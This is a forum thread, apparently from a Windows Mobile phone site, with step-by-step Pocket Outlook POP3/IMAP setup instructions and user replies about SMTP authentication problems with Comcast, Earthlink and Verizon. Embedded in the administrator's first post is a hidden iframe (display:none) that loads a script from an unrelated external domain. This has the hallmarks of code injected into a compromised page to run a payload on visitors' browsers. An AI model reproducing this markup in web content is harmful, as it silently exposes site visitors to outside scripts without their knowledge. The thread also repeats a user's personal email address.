+ Reply to Thread
Page 1 of 2 1 2 LastLast
    Editor and Site Administrator Convergent's Avatar

How do I send/receive POP3 email with my Phone Edition?

There are several ways to Send/Recieve Email with the Phone Edition.

<b>Using Pocket Outlook:</b><ol><li>Setup a new service by going to Services -&gt; New Service.</li>
    <li>Enter you Email Address the hit <i>Next</i>. </li>
    <li>Skip the Auto Configuration and select <i>Next</i>. </li>
    <li>In the User information type your Name (as you want it to be seen in the from field), your POP3 or IMAP username, and password if you want it to be saved (potential security issue if checked). then select <i>Next</i>. </li>
    <li>In the Account information select your service type either POP3 or IMAP and give your account a good name and select <i>Next</i>. </li>
    <li>In the Server Information enter your Incoming or POP3 mail server address and then enter your Outgoing or SMTP address. You can skip the domain unless your provider requires it.</li>
    <li><b>IMPORTANT:</b> Select advanced and uncheck "Check for new messages every 15 minutes" unless you want it to check automatically. Be aware that each time it checks, it will download all of the headers again. Unless you are on an unlimited data plan, this can use up your monthly allotment.</li>
    <li>Depending on your SMTP server, select the appropriate option for if your Outgoing mail server requires authentication. If you are not sure, check it. </li>
    <li>Select your connection type: GPRS Connection and select next</li>
    <li>Select whether or not to download just headers, or the whole message, and if you want just a part of the message. Then select <i>Next</i>.</li>
    <li>Finally, select whether or not you want to only display the last N days of messages and select finish. </li>
    </ol>
    Your POP3/IMAP email account setup is now complete. Some ISP's do not allow SMTP Relaying which will prohibit you from sending, yet you can still receive email. Check with your ISP / Host to see if they support SMTP Authentication or POP3 then SMTP authentication. Alternatively you can use a 3rd party SMTP service. Here are some choices for an SMTP service:<ul><li>SMTP.com</li>
    <li>Fastmail - Fastmail supports IMAP which is a nice alternative to POP3. Fastmail also has many tutorials to assist with your setup.</li>
    <li>HotPOP </li>
    <li>Free Email Address Directory - The other 3 have been recommended by users and will work. If you don't like any of them, this site offers a huge list of Email services. On the left side under EMAIL LISTINGS, check For-fee Email Service for the best choices, or also POP3 Mail Services or IMAP Mail services.</li></ul>
    Good news for T-Mobile customers is that they now offer <a class="postlink" target="_blank" href="https://myemail.t-mobile.com/html"><b>T-Mobile MyEmail</b></a> which provides you with email support, including SMTP, as part of their wireless service. This service will work with your existing POP3 mail account. AT&T has also added this service and details can be found at <a class="postlink" target="blank" href="http://pdasmtp.attwireless.net"><b>AT&T Email</b></a>.

<b>Web Based Email: </b>
    If your email service has the option, web based email can be done via Pocket Internet Explorer. This is a nice alternative, especially when someone else wants to check their email on your device. To use this service, you just go to the web mail site provided by your email service, and log in. Unfortunately, most web based email systems have not been designed to be used on a PDA screen and can be quite cumbersome. If anyone can recommend a service that is PDA friendly, please add a comment to this thread. Thanks.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Mike - Been Converged?

There are a couple of ways to Send/Recieve Email with the XDA.

Using Pocket Outlook:
    Setup a new service by going to Services -> New Service
    Enter you Email Address the hit Next
    Skip the Auto Configuration and select next
    In the User information type your Name (as you want it to be seen in the from field), your POP3 or IMAP username, and password if you want it to be saved (potential security issue if checked). then select next
    In the Account information select your service type either POP3 or IMAP and give your account a good name and select next
    In the Server Information enter your Incoming or POP3 mail server address and then enter your Outgoing or SMTP address. You can skip the domain unless your provider requires it. Select advanced and uncheck "Check for new messages every 15 minutes" unless you want it to. Also depending on your SMTP server, select the appropriate option for if your Outgoing mail server requires authentication. If you are not sure, check it. One last option, select your connection: GPRS Connection and select next
    Select whether or not to download just headers or the whole message and if you want just a part of the message and then select next
    Lastly, select whether or not you want to only display the last N days of messages and select finish.

You will then have your POP3/IMAP email account setup. Some ISP's do not allow SMTP Relaying which will prohibit you from sending, yet you can still recieve email. Check with your ISP / Host to see if they support SMTP Authentication or POP3 then SMTP authentication. Alternatively you can either sign up for 3rd party SMTP service.

Web Based Email:
    If you provider has the option, web based email can be done via Pocket Internet Explorer and can a nice alternative, especially when someone else wants to check their email on your device. Just go to the web mail site for your email provider and log in.

Editor and Site Administrator Convergent's Avatar

Updated

Updated list of SMTP service providers
    Mike - Been Converged?

# IMPORTANT: Select advanced and uncheck "Check for new messages every 15 minutes" unless you want it to check automatically. Be aware that each time it checks, it will download all of the headers again. Unless you are on an unlimited data plan, this can use up your monthly allotment.

I don't think this is true, this happens on IMAP, not POP3. POP always downloads new headers only, if it doesn't something's broken on one side.
    Zviratko

I'm a P800 switcher! :)

Re: Updated

Originally posted by MikeCollins
    Updated list of SMTP service providers
    Where?

Thanks,
    Gary

Unhappy SMTP Service

Is there someone out there who uses Verizon service with their Samsung I700 and is able to send e-mail using their pocket inbox. If so, please, please tell me how the heck you've done it. I've been trying for weeks. Nothing works for me i've tired hotpop, softpop, airbridge, airtouch, etc. Nothing works for me. What am i doing wrong? Comcast is my ISP. I have a cable modem with them for my desk top. I can receive my comcast mail on my I700 of course but i can't send. Please tell me how you guys are doing it.

delid2@comcast.net

Hello, I seem to be in the same situation as delid2 in that I am a comcast user and can't get outbound mail to flow. I am fairly certain that I did get airbridge to work at some time in the past, but it fails now for both work and home. Its fairly downstream now of your post. Did you get it to work?

Lightbulb Outgoing e-mail

Way Cool, I found out that i didn't have a box checked. The one thats says, require authenication. Make sure you use: mail.comcast.net for incoming pop3 and use smtp.comcast.net for the outgoing, which you probably already know. In your inbox for comcast that you've set up go to tools and then options. Click on comcast to highlight it. (it should have an asterick in front of it) Page 1 of 4 will come up. Then make sure the e-mail address is correct and hit next. Then page 2 of 4 has your full name, your user ID and then your password, make sure all those are correct and then check the save password box. Now hit next. Page 3 of 4 will have the service type as pop3 and the name comcast in there but they'd probably be grayed out. Don't worry about them being grayed out. Now hit next. Page 4 of 4 will have your incoming mail and your outgoing. Look at my first paragraph if you forgot what they're supposed to be. Make sure they're correct. Now here is were i went wrong. Hit the options button. You will see two boxes you can check. The top one is for checking for new messages how ever often you want. I left mine blank because i want to retrieve my messages when i want. THE SECOND BOX NEEDS TO BE CHECKED!! THE ONE THAT SAYS, OUTGOING E-MAIL SERVER REQUIRES AUTHENTICATION. When you read my previous inquiry about this problem, i had this box unchecked and that was my problem. Let me know if it worked.

delid2@comcast.net

Just got my T-Mobile PPCPE (finally, no thanks to A1wireless who screwed around for nearly two weeks before getting my phone delivered to me).

I'm trying to configure pop3 access the same way I had it setup in my antique HP Jornada 525. On the old one, I opened "inbox", went to Tools / Options / Services, clicked 'new', and was able to add each of the pop3 services i need to use.

On the PPCPE, the menu options to do this are disabled. The help says I have to disconnect to add services, but the "disconnect" option on the menu is disabled too.

How the heck do I fix this?

T-Mobile

Cell Head,

What did T-Mobile tech support say? I'm using Verizon and a totally different phone from yours, the I700. Tech support should be able to address this.

delid2@comcast.net

Still having touble sending emails

I have Earthlink and Comcast as providers. I can receive mail but can not send using either provider. Here are the earthlink settings I use.

incoming: pop.earthlink.net
    outgoing: smtp.earthlink.net

I just can't seem to get connected. Going out. Any thoughts?

Outbound e-mail

Did you ever get your comcast to work on your I700?

Did any of you ever resolve this? For some reason when I was using WM2002 I could set my ActiveSync account the same as my ISP and I believe that I could send. Since WM2003 - no luck.
    Bluenoser

Cool Comcast

Yes it was resolved,

It was a box in the e-mail set up options that had to be checked. The one that says "Authenticate." It you have problem finding it let me know. Just go to accounts at the bottom of your comcast inbox, click on Comcast (this should have an asterisk next to it) click next 3 times then click options. Click next twice and on that page you will see an option that says, "Outgoing e-mail server requires authentication." Make sure that box is checked. That was our problem all along. Hope that helped.
    The truth is out there... Trust no one...

Thanks! I have tried this before, and will try again. I have tried many different combinations....just tried it again with no luck. I am going to re-install WM2003 and see if this helps. I have put a lot of software on recently and there may be some interference or conflicts.
    Bluenoser

Comcast Issues

What do you have in your profile for your pop3 and smtp addresses?

How the heck do you open attachments?

Some of the others may know better and you should do a search in this discussion, but I have my i700 set to save attachments to the SD card, and then in the email I just click the attachment and it opens. I'll see what else I can find out.
    Bluenoser

I am trying to find out some info on this device for a friend. Are you guys using these settings to recieve and send without docking and using activesync?

Am I understanding right that you can email wirelessly with Verizon? If so, does it require an extra data plan, or does that come with the phone?

-Thanks.

E-mail Settings

Yes, these settings are for stand alone wireless transfer of e-mail sending and receiving. I.e. while you're walking down the street or sitting on a park bench. You don't need the cradle for this. If you used the cradle then it's called "Pass Through," which then the I700 just uses your computer desktop connection to send and receive.

As for your verizon plan. You have a choice. you don't have to get an extra data plan but you will be using up your regular mobile minutes. So lets say you have a 400 minute per month plan, then when you send and receive e-mail it will subtract from those minutes. You don't want that. I recommend to pay extra for the data plan. You can pay for as little as 5MB ($10.00)or more up to unlimited which is about $44.00. With unlimited you can connect and stay on line forever and you'll never pay more than $44.00. I have the 400 mins talking plan for $39.99 and the unlimited data plan for $44.00. With insurance and tax you're still well under $100.00 per month. It's worth it to be mobile with voice, e-mail and internet surfing from a park bench or while sitting on a bus. After all, that's why we got the I700 right, to be mobile. Don't limit yourself.